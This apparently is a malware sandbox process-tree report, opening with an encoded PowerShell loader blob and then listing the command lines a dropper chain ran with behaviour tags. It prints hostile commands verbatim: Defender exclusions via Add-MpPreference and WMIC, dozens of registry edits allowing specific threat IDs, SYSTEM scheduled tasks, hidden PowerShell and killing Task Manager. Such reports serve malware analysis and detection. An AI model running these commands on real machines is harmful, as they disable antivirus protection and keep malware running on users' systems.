AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\the.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\qjnar5mhQPzpks9OpNlu8jqr.exe"C:\Users\Admin\Pictures\qjnar5mhQPzpks9OpNlu8jqr.exe" /s6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\pKObCuHpjwoZZM8nL5N17RI3.exe"C:\Users\Admin\Pictures\pKObCuHpjwoZZM8nL5N17RI3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
-
C:\Users\Admin\Pictures\0ED8kn5cnmOyeZv2DQ8eB5il.exe"C:\Users\Admin\Pictures\0ED8kn5cnmOyeZv2DQ8eB5il.exe"6⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\dkFVZlmtLqTxxrtOi9FElXnO.exe"C:\Users\Admin\Pictures\dkFVZlmtLqTxxrtOi9FElXnO.exe"6⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\eLOyJkYRBZrXsLNa5scWY7nr.exe"C:\Users\Admin\Pictures\eLOyJkYRBZrXsLNa5scWY7nr.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD5BA.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S8⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 611⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 611⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 611⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 612⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 611⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 612⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe\" 1g /qbjdidxEEJ 385118 /S" /V1 /F9⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN10⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 10409⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\vir_e20dfe60-ed0f-4a5c-85f1-cc217d502163\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_3351c0a4-4a78-48aa-be99-5fd2463ba799\caller.cmd" "4⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5972 -ip 59721⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD983.tmp\Install.exe 1g /qbjdidxEEJ 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
